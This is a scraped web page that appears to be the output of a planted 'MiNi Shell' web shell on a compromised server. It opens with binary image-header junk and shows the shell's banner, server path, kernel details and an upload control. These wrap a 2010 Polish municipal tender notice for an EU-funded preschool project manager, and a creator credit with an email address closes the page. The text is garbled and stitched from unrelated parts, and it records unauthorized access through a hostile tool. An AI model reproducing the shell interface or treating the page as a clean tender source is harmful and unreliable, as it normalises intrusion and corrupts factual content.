JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100728/228690-N-2010.html

<p class="kh_header"><b>Rajcza: Usługa koordynacji projektu - świadczenie usługi kierownika projektu pn Przedszkolaki z Naszej Gminy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 228690 - 2010; data zamieszczenia: 28.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Rajcza , ul. Górska 1, 34-370 Rajcza, woj. śląskie, tel. 033 8643155 w. 33, faks 033 8643887.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rajcza.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa koordynacji projektu - świadczenie usługi kierownika projektu pn Przedszkolaki z Naszej Gminy współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi Kierownika projektu pn. Przedszkolaki z Naszej Gminy realizowanym w ramach Priorytetu IX  Rozwój wykształcenia i kompetencji w regionach, Działania 9.1 Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałania 9.1.1 Zmniejszenie nierówności w stopniu upowszechniania edukacji przedszkolnej Programu Operacyjnego Kapitał Ludzki 2007 - 2013 przez Urząd Gminy Rajcza finansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA 
Usługa zarządzania projektem pn. Przedszkolaki z Naszej Gminy obejmuje :
-	określanie planów działań w ramach projektu,
-	zarządzanie czasem realizacji projektu, 
-	reprezentowanie Zamawiającego wobec osób trzecich w zakresie powierzonych spraw dot. projektu, 
-	nadzór nad wszystkimi działaniami podejmowanymi w projekcie, 
-	nadzór nad wydatkami dot. projektu, 
-	nadzór nad realizacją każdego etapu przedsięwzięcia oraz personelem zatrudnionym na potrzeby projektu, 
-	podejmowanie decyzji związanych z modyfikacją projektu,
-	współpraca z jednostkami zaangażowanymi w realizację projektu w tym z wybranymi referatami Urzędu Gminy Rajcza, przedszkolem w Rajczy, których projekt dotyczy,
-	zarządzanie merytoryczne i logistyczne projektem, w tym w zakresie promocji, rekrutacji, przygotowania zamówień publicznych oraz umów, organizacji logistycznej wprowadzanych zajęć w placówce przedszkolnej, zakupu sprzętu, wyposażenia oraz materiałów  administracyjnych, sprawozdawczości i rozliczeń prowadzonych z IP, 
-	przygotowanie i przedstawienie Wójtowi Gminy Rajcza sprawozdań z przebiegu projektu co najmniej 1 raz na kwartał, 
-	czuwanie nad prawidłowym przebiegiem realizacji projektu zgodnym z budżetem i harmonogramem. 
-	nadzór nad całością realizacji przedsięwzięcia i reprezentowanie go na zewnątrz zgodnie z wnioskiem i umową zawartą z Instytucja Pośredniczącą tj. Urzędem Marszałkowskim Województwa Śląskiego,
-	wybór podwykonawców w ramach projektu, 
-	koordynacji rozliczeń finansowych i współpracy w tym zakresie z księgowością,
-	sprawdzania dowodów księgowych projektu pod względem merytorycznym,
-	organizowanie spotkań i pracy zespołu projektowego obsługującego Projekt;
-	rozwiązywanie problemów i udzielanie odpowiedzi na pytania zespołu projektowego obsługującego Projekt;
-	nadzór i kontrola nad prawidłowym dokumentowaniem realizacji Projektu zgodnie z umową o dofinansowanie projektu oraz z wytycznymi w tym zakresie,
-	czuwanie nad prawidłowym oznaczeniem obowiązującymi logotypami dokumentacji Projektowej, materiałów promocyjnych, informacyjnych, edukacyjnych, oznaczeniem budynków i pomieszczeń w których prowadzony jest Projekt, informowaniem uczestników Projektu o współfinansowaniu Projektu ze środków Europejskiego Funduszu Społecznego;
-	opracowanie i przygotowanie dokumentacji dot. projektu w tym formularzy zgłoszeniowych, deklaracji, ankiet ewaluacyjnych itp.,
-	nadzór nad monitoringiem i ewaluacją Projektu,
-	nadzorowanie i udział w przeprowadzeniu naboru i selekcji uczestników projektu w oparciu o przyjęte kryteria,
-	przygotowanie wniosków o płatność w zakresie merytorycznym,
-	opracowanie i przedstawienie rezultatów projektu,
-	analiza ryzyka - raportowanie o zauważalnych nieprawidłowościach oraz przygotowanie scenariuszy działań naprawczych,

2.4.	Wykonawca zobowiązany będzie do:
-	świadczenia Usług z należytą starannością, zgodnie z najlepszymi praktykami stosowanymi przy usługach zarządzania; 
-	koordynacji działań projektu i zapewnienia płynności ich realizacji;
-	koordynacji rozliczeń finansowych i współpracy w tym zakresie z Wydziałem Budżetu i Finansów Zamawiającego;
-	wsparcia pracowników odpowiedzialnych za promocję projektu w sposób zgodny z wytycznymi w tym zakresie;
-	współpracy z pracownikami odpowiedzialnymi za sporządzanie wniosków o płatność oraz przekazywanie ich uprawnionym jednostkom;
-	niezwłocznego informowanie Zamawiającego o wszystkich faktach mających znaczenie dla realizacji Projektu, a zwłaszcza o wszystkich zagrożeniach związanych z: dotrzymaniem terminu zakończenia Projektu czy poszczególnych zadań w ramach Projektu, dotrzymanie terminu przedłożenia wniosku o płatność, zmianami w budżecie Projektu; zmianami  Harmonogramu realizacji Projektu, w tym przede wszystkim zmianami mającymi wpływ na zakres, cele, czy rezultaty Projektu.
-	informowania Zamawiającego o wszystkich występujących oraz przewidywanych problemach w trakcie realizacji Projektu oraz wprowadzanie w uzgodnieniu z Zamawiającym i Instytucją Pośredniczącą działań zapobiegawczych i naprawczych;
-	aktywnego uczestnictwa w audytach kontrolnych i audycie końcowym,

2.5.	W trakcie realizacji usługi Zamawiający zobowiązuje się do:
-	przekazania pełnej dokumentacji Projektu numer WND - POKL.09.01.01-24-101/10 pn. Przedszkolaki z Naszej Gminy, 
-	wskazania  pracowników do współpracy z Wykonawcą odpowiedzialnych w szczególności za:
o	przygotowywanie sprawozdań i rozliczeń dot. projektu (w części finansowo - księgowej),
o	prowadzenie dokumentacji finansowej i przygotowywanie sprawozdań (wniosków o płatność w części finansowej),
o	prowadzenie rozliczeń finansowych i współpracy w tym zakresie z księgowością Zamawiającego, 
o	opisywania faktur  i innych dokumentów księgowych wystawionych w ramach projektu, 
o	sprawdzania dowodów księgowych projektu pod względem rachunkowym,
o	zapewnienia terminowej realizacji płatności zobowiązań zgodnie z zatwierdzonym harmonogramem i postępem finansowym projektu, 
o	archiwizacja dokumentacji księgowej dotyczącej projektu, 
o	przygotowania niezbędnych dokumentów finansowych na potrzeby sporządzenia wniosków o płatność, 
o	czynnego uczestniczenia we wszelkich kontrolach dotyczących realizacji projektu,
o	przestrzeganie zasad wynikających z przyjętej we wniosku o dofinansowanie oraz umowie metodologii dla rozliczenia kosztów dot. projektu,
o	czuwanie nad kwalifikowalnością wydatków poniesionych w ramach projektu zgodnie z wytycznymi w tym zakresie.
o	organizacje spotkań roboczych pracowników zaangażowanych w realizację przedsięwzięcia,
o	udział w przygotowywaniu umów zawieranych w ramach projektu,
o	promocję projektu w sposób zgodny z wytycznymi w tym zakresie, w tym prowadzenie promocji i upowszechniania informacji o projekcie (aktualizacja strony internetowej projektu),
o	udział w przeprowadzeniu naboru i selekcji uczestników projektu w oparciu o przyjęte kryteria,
o	weryfikację kwalifikowalności uczestników projektu,
o	współpracę z uczestnikami projektu oraz osobami i instytucjami zewnętrznymi zainteresowanymi projektem,
o	udzielanie informacji o Projekcie - telefoniczne, ustnie, pisemnie lub za pośrednictwem Internetu,
o	prowadzenie dokumentacji osobowej uczestników projektu (ankiety osobowe, formularze, oświadczenia itp.),
o	udział w przygotowaniu oraz czuwanie nad realizacją prowadzonych zajęć ogólnorozwojowych oraz specjalistycznych, 
o	prowadzenie biura projektu, 
o	prowadzenie dokumentacji projektu,
o	czuwanie nad prawidłowym przepływem informacji wewnątrz jak i na zewnątrz projektu,
o	przygotowywanie informacji o koniecznych do wprowadzenia zmianach i korektach związanych z wdrażaniem Projektu wraz z ich uzasadnieniem, celem zatwierdzenia i dopuszczenia wnioskowanych zmian w Projekcie przez IP z zachowaniem terminów określonych w umowie o dofinansowanie Projektu;
o	terminowe przedstawianie na wezwanie IP wszelkich informacji i wyjaśnień związanych z realizacją Projektu,
o	utrzymywanie stałego i terminowego kontaktu z Instytucją Pośredniczącą (IP),
o	sprawdzanie i zatwierdzanie (rejestrowanie) korespondencji dot. projektu,
-	wskazania osoby do kontaktów z Wykonawcą ze strony Zamawiającego, 
-	przygotowywania dokumentów niezbędnych do: 
o	sporządzania wniosków o płatność,
o	sporządzania raportów z postępów w realizacji projektu oraz raportu końcowego.
-	informowania Wykonawcy o zamiarach wprowadzenia zmian organizacyjnych lub zmian w działalności Zamawiającego, które mają lub mogą mieć wpływ na przebieg realizacji projektu.

2.6.	Wykonawca odpowiadać będzie wobec Zamawiającego za: 
-	terminowe wykonywanie wszystkich czynności związanych z realizacją usługi,
-	poprawność przedstawianych dokumentów finansowych i dokonywanie ich opisu zgodnie z wymogami w tym zakresie (w zakresie merytorycznym),
-	poprawność sporządzanych rozliczeń finansowo - merytorycznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dysponowania osobami zdolnymi do wykonania zamówienia wymagane jest posiadanie przez Wykonawcę:
-	wykształcenia wyższego (magisterskie) na Wydziale Europeistyki, Zarządzania lub pokrewnym, 
-	co najmniej rocznego doświadczenia pracy w administracji samorządowej (umowa o pracę), 
-	co najmniej dwuletniego doświadczenia na stanowisku kierowniczym w projektach współfinansowanymi ze środków UE, w tym ze środków Europejskiego Funduszu Społecznego;
-	co najmniej czteroletniego doświadczenia w realizacji projektów  współfinansowanymi ze środków UE, w tym ze środków Europejskiego Funduszu Społecznego, 
-	co najmniej dwóch imiennych certyfikatów / zaświadczeń stwierdzających udział w szkoleniach dotyczących nowego okresu programowania na lata 2007 - 2013 Programu Operacyjnego Kapitał Ludzki, 
-	przeprowadzenia lub prowadzenia projektów o podobnym charakterze jako Kierownik projektu z udziałem środków UE, w tym środków Europejskiego Funduszu Społecznego 
W zakresie spełnienia tego warunku konieczne będzie przedłożenie przez Wykonawcę dokumentów poświadczających posiadaną wiedze i doświadczenie tj.  CV Wykonawcy wraz z informacjami na temat posiadanych kwalifikacji, a także zakresu wykonywanych czynności i przebiegu pracy zawodowej, kserokopię dokumentów potwierdzających wykształcenie oraz przebieg pracy zawodowej, w tym: kserokopię dyplomu ukończenia studiów wyższych, kserokopię świadectw pracy, opinii, referencji, umów; kserokopię dokumentów poświadczających udział w szkoleniach (certyfikaty/zaświadczenia).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach  dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Kserokopię dokumentów potwierdzających wykształcenie oraz przebieg pracy zawodowej, w tym: kserokopię dyplomu ukończenia studiów wyższych, kserokopię świadectw pracy, opinii, referencji, umów; 
2.	Kserokopię dokumentów poświadczających udział w szkoleniach (certyfikaty/zaświadczenia). 
3.	CV Wykonawcy wraz z informacjami na temat posiadanych kwalifikacji, a także zakresu wykonywanych czynności i przebiegu pracy zawodowej - Załącznik nr 5 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.3	Pozostałe oświadczenia i dokumenty: 
a)	Wypełniony formularz ofertowy - Załącznik nr 1 do SIWZ. 
b)	Wypełniony i podpisany wzór umowy - Załącznik nr 4 do SIWZ. 
c)	W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo do reprezentowania Wykonawców w niniejszym postępowaniu albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. 
d)	Pełnomocnictwo udzielane osobą podpisującym dokumenty ofertowe, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rajcza.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego, pokój nr 24, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2010 godzina 10:30, miejsce: j.w..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 03.09.2010.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com